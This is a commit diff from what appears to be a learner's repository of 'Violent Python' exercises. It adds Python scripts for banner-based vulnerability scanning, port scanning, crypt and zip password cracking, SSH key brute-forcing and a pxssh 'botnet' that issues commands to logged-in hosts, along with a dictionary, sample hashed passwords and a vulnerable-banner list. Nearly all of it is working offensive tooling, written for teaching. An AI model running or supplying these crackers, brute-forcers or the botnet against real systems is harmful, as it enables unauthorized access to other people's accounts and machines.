royalbhati
diff --git a/‎CH1/.DS_Store
6 KB b/‎CH1/.DS_Store
6 KB
diff --git a/‎CH1/1-vulnScanner.py
+56 b/‎CH1/1-vulnScanner.py
+56
diff --git a/‎CH1/2-passwdCrack.py
+28 b/‎CH1/2-passwdCrack.py
+28
diff --git a/‎CH1/3-zipCrack.py
+41 b/‎CH1/3-zipCrack.py
+41
diff --git a/‎CH1/dictionary.txt
+8 b/‎CH1/dictionary.txt
+8
diff --git a/‎CH1/evil.zip
34.9 KB b/‎CH1/evil.zip
34.9 KB
diff --git a/‎CH1/passwords.txt
+2 b/‎CH1/passwords.txt
+2
diff --git a/‎CH1/vuln-banners.txt
+30 b/‎CH1/vuln-banners.txt
+30
diff --git a/‎CH2/.DS_Store
6 KB b/‎CH2/.DS_Store
6 KB
diff --git a/‎CH2/1-portScan.py
+62 b/‎CH2/1-portScan.py
+62
diff --git a/‎CH2/2-nmapScan.py
+32 b/‎CH2/2-nmapScan.py
+32
diff --git a/‎CH2/3-botNet.py
+48 b/‎CH2/3-botNet.py
+48
diff --git a/‎CH2/3-bruteKey.py
+79 b/‎CH2/3-bruteKey.py
+79
@@ -0,0 +1,56 @@
+
+import socket
+import os
+import sys
+
+
+def retBanner(ip, port):
+    try:
+        socket.setdefaulttimeout(2)
+        s = socket.socket()
+        s.connect((ip, port))
+        banner = s.recv(1024)
+        return banner
+    except:
+        return
+
+
+def checkVulns(banner, filename):
+
+    f = open(filename, 'r')
+    for line in f.readlines():
+        if line.strip('\n') in banner:
+            print('[+] Server is vulnerable: ' + banner.strip('\n'))
+                
+
+
+def main():
+
+    if len(sys.argv) == 2:
+        filename = sys.argv[1]
+        if not os.path.isfile(filename):
+            print('[-] ' + filename +\
+                ' does not exist.')
+            exit(0)
+
+        if not os.access(filename, os.R_OK):
+            print('[-] ' + filename +\
+                ' access denied.')
+            exit(0)
+    else:   
+        print('[-] Usage: ' + str(sys.argv[0]) +\
+            ' <vuln filename>')
+        exit(0)
+
+    portList = [21,22,25,80,110,443]
+    for x in range(147, 150):
+        ip = '192.168.95.' + str(x)
+        for port in portList:
+            banner = retBanner(ip, port)
+            if banner:
+                print ('[+] ' + ip + ' : ' + banner)
+                checkVulns(banner, filename)
+
+
+if __name__ == '__main__':
+    main()
@@ -0,0 +1,28 @@
+import crypt
+
+
+def testPass(cryptPass):
+    salt = cryptPass[0:2]
+    dictFile = open('dictionary.txt', 'r')
+    for word in dictFile.readlines():
+        word = word.strip('\n')
+        cryptWord = crypt.crypt(word, salt)
+        if cryptWord == cryptPass:
+            print('[+] Found Password: '+ word + '\n')
+            return
+    print('[-] Password Not Found.\n')
+    return
+
+
+def main():
+    passFile = open('passwords.txt')
+    for line in passFile.readlines():
+        if ':' in line:
+            user = line.split(':')[0]
+            cryptPass = line.split(':')[1].strip(' ')
+            print('[*] Cracking Password For: ' + user)
+            testPass(cryptPass)
+
+
+if __name__ == '__main__':
+    main()
@@ -0,0 +1,41 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import zipfile
+import optparse
+from threading import Thread
+
+
+def extractFile(zFile, password):
+    try:
+        zFile.extractall(pwd=password)
+        print('[+] Found password ' + password + '\n')
+    except:
+        pass
+
+
+def main():
+    parser = optparse.OptionParser("usage %prog "+\
+      "-f <zipfile> -d <dictionary>")
+    parser.add_option('-f', dest='zname', type='string',\
+      help='specify zip file')
+    parser.add_option('-d', dest='dname', type='string',\
+      help='specify dictionary file')
+    (options, args) = parser.parse_args()
+    if (options.zname == None) | (options.dname == None):
+        print(parser.usage)
+        exit(0)
+    else:
+        zname = options.zname
+        dname = options.dname
+
+    zFile = zipfile.ZipFile(zname)
+    passFile = open(dname)
+
+    for line in passFile.readlines():
+        password = line.strip('\n')
+        t = Thread(target=extractFile, args=(zFile, password))
+        t.start()
+
+
+if __name__ == '__main__':
+    main()
@@ -0,0 +1,8 @@
+apple
+orange
+egg
+lemon
+grapes
+secret
+strawberry
+password
@@ -0,0 +1,2 @@
+victim: HX9LLTdc/jiDE: 503:100:Iama Victim:/home/victim:/bin/sh
+root: DFNFxgW7C05fo: 504:100: Markus Hess:/root:/bin/bash
@@ -0,0 +1,30 @@
+3Com 3CDaemon FTP Server Version 2.0
+Ability Server 2.34
+
+CCProxy Telnet Service Ready
+
+ESMTP TABS Mail Server for Windows NT
+
+FreeFloat Ftp Server (Version 1.00) 
+
+IMAP4rev1 MDaemon 9.6.4 ready
+
+MailEnable Service, Version: 0-1.54
+
+NetDecision-HTTP-Server 1.0
+PSO Proxy 0.9
+
+SAMBAR
+
+Sami FTP Server 2.0.2
+
+Spipe 1.0
+
+TelSrv 1.5
+
+WDaemon 6.8.5
+
+WinGate 6.1.1
+Xitami
+
+YahooPOPs! Simple Mail Transfer Service Ready
@@ -0,0 +1,62 @@
+import optparse
+from socket import *
+from threading import *
+
+screenLock = Semaphore(value=1)
+
+def connScan(tgtHost, tgtPort):
+    try:
+        connSkt = socket(AF_INET, SOCK_STREAM)
+        connSkt.connect((tgtHost, tgtPort))
+        connSkt.send('ViolentPython\r\n')
+        results = connSkt.recv(100)
+        screenLock.acquire()
+        print('[+] %d/tcp open' % tgtPort)
+        print('[+] ' + str(results))
+    except:
+        screenLock.acquire()
+        print('[-] %d/tcp closed' % tgtPort)
+    finally:
+	screenLock.release()
+	connSkt.close()	
+
+def portScan(tgtHost, tgtPorts):
+    try:
+        tgtIP = gethostbyname(tgtHost)
+    except:
+        print("[-] Cannot resolve '%s': Unknown host" %tgtHost)
+        return
+
+    try:
+        tgtName = gethostbyaddr(tgtIP)
+        print('\n[+] Scan Results for: ' + tgtName[0])
+    except:
+        print('\n[+] Scan Results for: ' + tgtIP)
+
+    setdefaulttimeout(1)
+    for tgtPort in tgtPorts:
+        t = Thread(target=connScan,args=(tgtHost,int(tgtPort)))
+        t.start()
+
+def main():
+    parser = optparse.OptionParser('usage %prog '+\
+      '-H <target host> -p <target port>')
+    parser.add_option('-H', dest='tgtHost', type='string',\
+      help='specify target host')
+    parser.add_option('-p', dest='tgtPort', type='string',\
+      help='specify target port[s] separated by comma')
+
+    (options, args) = parser.parse_args()
+
+    tgtHost = options.tgtHost
+    tgtPorts = str(options.tgtPort).split(',')
+
+    if (tgtHost == None) | (tgtPorts[0] == None):
+	print(parser.usage)
+        exit(0)
+
+    portScan(tgtHost, tgtPorts)
+
+
+if __name__ == '__main__':
+    main()
@@ -0,0 +1,32 @@
+import nmap
+import optparse
+
+def nmapScan(tgtHost,tgtPort):
+    nmScan = nmap.PortScanner()
+    nmScan.scan(tgtHost,tgtPort)
+    state=nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
+    print "[*] " + tgtHost + " tcp/"+tgtPort +" "+state
+
+def main():
+    parser = optparse.OptionParser('usage %prog '+\
+                                   '-H <target host> -p <target port>')
+    parser.add_option('-H', dest='tgtHost', type='string',\
+                      help='specify target host')
+    parser.add_option('-p', dest='tgtPort', type='string',\
+                      help='specify target port[s] separated by comma')
+    
+    (options, args) = parser.parse_args()
+    
+    tgtHost = options.tgtHost
+    tgtPorts = str(options.tgtPort).split(',')
+    
+    if (tgtHost == None) | (tgtPorts[0] == None):
+        print parser.usage
+        exit(0)
+    for tgtPort in tgtPorts:
+        nmapScan(tgtHost, tgtPort)
+
+
+if __name__ == '__main__':
+    main()
+
@@ -0,0 +1,48 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import optparse
+import pxssh
+
+
+class Client:
+
+    def __init__(self, host, user, password):
+        self.host = host
+        self.user = user
+        self.password = password
+        self.session = self.connect()
+
+    def connect(self):
+        try:
+            s = pxssh.pxssh()
+            s.login(self.host, self.user, self.password)
+            return s
+        except Exception, e:
+            print e
+            print '[-] Error Connecting'
+
+    def send_command(self, cmd):
+        self.session.sendline(cmd)
+        self.session.prompt()
+        return self.session.before
+
+
+def botnetCommand(command):
+    for client in botNet:
+        output = client.send_command(command)
+        print '[*] Output from ' + client.host
+        print '[+] ' + output 
+
+
+def addClient(host, user, password):
+    client = Client(host, user, password)
+    botNet.append(client)
+
+
+botNet = []
+addClient('127.0.0.1', 'root', 'toor')
+addClient('127.0.0.1', 'root', 'toor')
+addClient('127.0.0.1', 'root', 'toor')
+
+botnetCommand('uname -v')
+botnetCommand('cat /etc/issue')
@@ -0,0 +1,79 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import pexpect
+import optparse
+import os
+from threading import *
+
+maxConnections = 5
+connection_lock = BoundedSemaphore(value=maxConnections)
+Stop = False
+Fails = 0
+
+
+def connect(user,host,keyfile,release):
+    global Stop
+    global Fails
+    try:
+        perm_denied = 'Permission denied'
+        ssh_newkey = 'Are you sure you want to continue'
+        conn_closed = 'Connection closed by remote host'
+        opt = ' -o PasswordAuthentication=no'
+        connStr = 'ssh ' + user +\
+          '@' + host + ' -i ' + keyfile + opt
+        child = pexpect.spawn(connStr)
+        ret = child.expect([pexpect.TIMEOUT,perm_denied,\
+          ssh_newkey,conn_closed,'$','#',])
+        if ret == 2:
+            print '[-] Adding Host to ~/.ssh/known_hosts'
+            child.sendline('yes')
+            connect(user, host, keyfile, False)
+        elif ret == 3:
+            print '[-] Connection Closed By Remote Host'
+            Fails += 1
+        elif ret > 3:
+            print '[+] Success. ' + str(keyfile)
+            Stop = True
+    finally:
+        if release:
+            connection_lock.release()
+
+
+def main():
+    parser = optparse.OptionParser('usage %prog -H '+\
+      '<target host> -u <user> -d <directory>')
+    parser.add_option('-H', dest='tgtHost', type='string',\
+      help='specify target host')
+    parser.add_option('-d', dest='passDir', type='string',\
+      help='specify directory with keys')
+    parser.add_option('-u', dest='user', type='string',\
+      help='specify the user')
+
+    (options, args) = parser.parse_args()
+    host = options.tgtHost
+    passDir = options.passDir
+    user = options.user
+
+    if host == None or passDir == None or user == None:
+        print parser.usage
+        exit(0)
+
+    for filename in os.listdir(passDir):
+        if Stop:
+            print '[*] Exiting: Key Found.'
+            exit(0)
+        if Fails > 5:
+            print '[!] Exiting: '+\
+              'Too Many Connections Closed By Remote Host.'
+            print '[!] Adjust number of simultaneous threads.'
+            exit(0)
+        connection_lock.acquire()
+        fullpath = os.path.join(passDir, filename)
+        print '[-] Testing keyfile ' + str(fullpath)
+        t = Thread(target=connect,\
+          args=(user, host, fullpath, True))
+        child = t.start()
+
+
+if __name__ == '__main__':
+    main()
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,2 @@`
	`1`	`+victim: HX9LLTdc/jiDE: 503:100:Iama Victim:/home/victim:/bin/sh`
	`2`	`+root: DFNFxgW7C05fo: 504:100: Markus Hess:/root:/bin/bash`